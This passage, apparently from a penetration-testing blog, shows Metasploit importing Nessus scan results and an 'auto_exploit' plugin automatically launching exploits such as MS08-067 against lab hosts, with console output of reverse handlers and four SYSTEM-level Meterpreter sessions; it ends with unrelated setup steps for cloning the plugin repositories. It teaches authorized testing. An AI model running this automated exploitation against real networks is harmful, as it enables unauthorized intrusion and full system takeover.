[*] importing 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
[*] 192.168.1.99
[*] 192.168.1.241
[*] 192.168.1.237
[*] 192.168.1.235
[*] 192.168.1.234
[*] 192.168.1.230
[*] 192.168.1.223
[*] 192.168.1.2
[*] 192.168.1.192
[*] 192.168.1.156
[*] 192.168.1.155
[*] 192.168.1.154
[*] 192.168.1.153
[*] 192.168.1.146
[*] 192.168.1.143
[*] 192.168.1.134
[*] 192.168.1.113
[*] 192.168.1.109
[*] 192.168.1.102
[*] 192.168.1.100
[*] 192.168.1.1
[+] Done

After the import you can look at the vulnerabilities found by using the vulns command:

msf > vulns
[*] Time: 2012-02-16 16:01:44 UTC Vuln: host=192.168.1.1 port=443 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=111 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) refs=CVE-2008-4250,BID-31874,OSVDB-49243,IAVA-2008-A-0081,MSFT-MS08-067,CWE-94,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34477
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=53 proto=tcp name=Nessus SNMP Scanner refs=NSS-14274
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.100 port=59159 proto=tcp name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.102 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.109 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
.......

Once we confirm that vulnerabilities where found we can use the auto_exploit plugin I wrote and updated for this blogpost, it can be found at https://github.com/darkoperator/Metasploit-Plugins/blob/master/auto_exploit.rb you just need to put a copy of it in your OSX/Linux host in to ~/.msf4/plugins so as to be able to use it. We start by loading it and looking at the options of the vuln_exploit command that will allow us to exploit the hosts found to be vulnerable:

msf > load auto_exploit 
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP's and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.

To launch the exploits found we just use the vuln_exploit command, this will analyze the vulnerabilities found and match them modules in the framework launching by default 3 exploits at a time auto configured with the best possible payload for the platform and limiting to one session per host:

msf > vuln_exploit
[*] Generating List for Matching...
[*] Matching Exploits (This will take a while depending on number of hosts)...
[+] Matched Exploits:
[+]     192.168.1.153 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.113 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.99 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.192 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom 135 500
[+]     192.168.1.154 exploit/linux/samba/lsa_transnames_heap 445 400
[+]     192.168.1.113 exploit/windows/smb/ms06_040_netapi 445 400
[+]     192.168.1.153 exploit/windows/smb/ms04_011_lsass 445 400
[+]     192.168.1.153 exploit/windows/smb/ms06_040_netapi 445 400
[+]     192.168.1.153 exploit/windows/smb/ms05_039_pnp 445 400
[+]     192.168.1.153 exploit/windows/smb/ms04_007_killbill 445 100
[*] Running Exploits:
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.153
[*] Started reverse handler on 192.168.1.241:29271 
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.113
[*] Automatically detecting the target...
[*] Started reverse handler on 192.168.1.241:4643 
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.99
[*] Started reverse handler on 192.168.1.241:14900 
[*] Automatically detecting the target...
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.99
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.153
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.113
[*] waiting for finishing some modules... active jobs: 3 / threads: 16
[*] Meterpreter session 1 opened (192.168.1.241:14900 -> 192.168.1.99:1513) at 2012-02-16 12:54:23 -0400
[*] Meterpreter session 2 opened (192.168.1.241:29271 -> 192.168.1.153:2709) at 2012-02-16 12:54:23 -0400
[*] Meterpreter session 3 opened (192.168.1.241:4643 -> 192.168.1.113:4035) at 2012-02-16 12:54:23 -0400
[*] waiting for finishing some modules... active jobs: 0 / threads: 19
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.192
[+]     Skipping 192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom because a session already exists.
[*] Started reverse handler on 192.168.1.241:15430 
[*] Running exploit/linux/samba/lsa_transnames_heap against 192.168.1.154
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[+]     Skipping 192.168.1.113 exploit/windows/smb/ms06_040_netapi because a session already exists.
[*] Started reverse handler on 192.168.1.241:48452 
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_011_lsass because a session already exists.
[*] Creating nop sled....
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms06_040_netapi because a session already exists.
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms05_039_pnp because a session already exists.
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_007_killbill because a session already exists.
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Attempting to trigger the vulnerability...
msf > [*] Sending stage (752128 bytes) to 192.168.1.192
[*] Meterpreter session 4 opened (192.168.1.241:15430 -> 192.168.1.192:1597) at 2012-02-16 12:54:29 -0400

We can now take a look at the sessions found using the sessions command:

msf > sessions 
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ CARLOS-CD652C1C  192.168.1.241:14900 -> 192.168.1.99:1513
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2KADV01       192.168.1.241:29271 -> 192.168.1.153:2709
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TEST-01BCDAF47C  192.168.1.241:4643 -> 192.168.1.113:4035
  4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DBSQL2K01        192.168.1.241:15430 -> 192.168.1.192:1597

As you can see the mix of the the new filtering in Nessus 5 with the Nessus plugin and my auto_exploit plugin allows to one be less noisy and more tactical when it comes to exploitation when used in conjunction. Hope you found this blog post informative and useful as always.

mkdir ~/Development

After this you can clone the repos in to this folder:

cd ~/Deveolpment
git clone https://github.com/darkoperator/Metasploit-Plugins.git msf_plugins
git clone https://github.com/darkoperator/Meterpreter-Scripts.git msf_modules

Now we can link the modules to our ~/.msf4 directory so we can use them transparently with any instance of the framework we might be running on the machine:

ln -s ~/Development/msf_plugins/ ~/.msf4/plugins
ln -s ~/Development/msf_modules/ ~/.msf4/modules

To keep them updated is just a simple git pull in each directory to get the latest changes and bug fixes.